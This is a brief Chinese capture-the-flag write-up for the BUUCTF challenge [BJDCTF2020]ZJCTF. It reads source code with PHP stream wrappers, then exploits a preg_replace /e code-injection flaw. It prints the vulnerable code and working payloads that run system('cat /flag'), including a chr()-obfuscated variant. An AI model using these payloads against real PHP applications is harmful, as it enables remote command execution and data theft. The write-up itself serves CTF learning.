BUU [BJDCTF2020]ZJCTF,不过如此
和BUU [ZJCTF 2019]NiZhuanSiWei一样。
?text=data://text/plain,I have a dream &file=php://filter/read=convert.base64-encode/resource=next.php
得到next.php源码。
<?php $id = $_GET['id']; $_SESSION['id'] = $id; function complex($re, $str) { return preg_replace('/(' . $re . ')/ei','strtolower("\\1")',$str); } foreach($_GET as $re => $str) { echo complex($re, $str). "\n"; } function getFlag(){ @eval($_GET['cmd']); }
最终目的是调用getFlag()然后命令执行。
get和session两个值一样的,名字为id的变量,没什么用,估计是用来混淆不知道的那些人。
preg_replace()的/e模式存在命令执行。
深入研究preg_replace与代码执行 - 先知社区 (aliyun.com)
最终payload:
?text=data://text/plain,I have a dream&file=next.php& + \S*=${getFlag()}&cmd=system('cat /flag'); \S*=${system(chr(99).chr(97).chr(116).chr(32).chr(47).chr(102).chr(108).chr(97).chr(103))} //chr拼接system的参数 \S*=${phpinfo()}可查看phpinfo()
![[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解](https://ucc.alicdn.com/pic/developer-ecology/p5p4weppao3em_6196bea7b85e43ae88067b12f480beb1.png?x-oss-process=image/format,webp/resize,h_160,m_lfit)